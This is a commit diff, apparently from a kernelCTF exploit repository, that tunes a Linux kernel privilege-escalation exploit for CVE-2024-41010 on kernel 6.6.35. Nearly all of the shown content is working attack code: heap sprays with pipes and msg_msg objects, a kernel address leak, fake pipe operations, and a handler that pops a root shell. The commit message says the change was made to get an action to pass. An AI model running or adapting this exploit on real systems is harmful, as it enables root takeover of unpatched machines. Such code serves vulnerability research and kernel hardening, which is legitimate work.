fix(exploit): idk why action return exit 1 but for pass

google · Aug 21, 2024 · 5e8899b · 5e8899b
1 parent e6a5b2f
commit 5e8899b
Showing 1 changed file with 8 additions and 6 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c b/pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c
@@ -30,6 +30,8 @@
 
 #include <arpa/inet.h>
 
+#include <libmnl/libmnl.h>
+
 #include "modules/pipe.h"
 #include "modules/xattr.h"
 #include "modules/helper.h"
@@ -49,7 +51,7 @@
 
 #define MTYPE_PRIMARY 0x41
 
-#define CC_OVERFLOW_FACTOR 1
+#define CC_OVERFLOW_FACTOR 2
 #define OBJS_PER_SLAB 16
 #define CPU_PARTIAL (24 * 6)
 #define OBJS_FRONT 48
@@ -749,8 +751,8 @@ int run(void)
 		goto retry_1bit_off;
 	}
 
-	struct pipeio *pipes[0x180];
-	for(int i=0; i<0x180; i++)
+	struct pipeio *pipes[0x1f0];
+	for(int i=0; i<0x1f0; i++)
 	{
 		pipes[i] = create_pipeio();
 		resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64);
@@ -770,7 +772,7 @@ int run(void)
 
 	spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0);
 
-	for(int i=0; i<0x200; i++)
+	for(int i=0; i<0x1f0; i++)
 		activate_ops(pipes[i]);
 
 	uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28;
@@ -850,15 +852,15 @@ int run(void)
 
 	printf("[+] target: 0x%llx\n", nodes[nodes_front].xattr.name);
 
-	for(int i=0; i<0x180; i++)
+	for(int i=0; i<0x1f0; i++)
 		write_pipe(pipes[i], ((char *)&longjump - (longjump_victim_address&0xfff)), 
 								(longjump_victim_address&0xfff) + sizeof(longjump));
 
 	signal(SIGSEGV, get_shell);
 
 	printf("[*] execute fake ops\n");
 
-	for(int i=0; i<0x180; i++)
+	for(int i=0; i<0x1f0; i++)
 		release_pipe(pipes[i]);
 
 	return 0;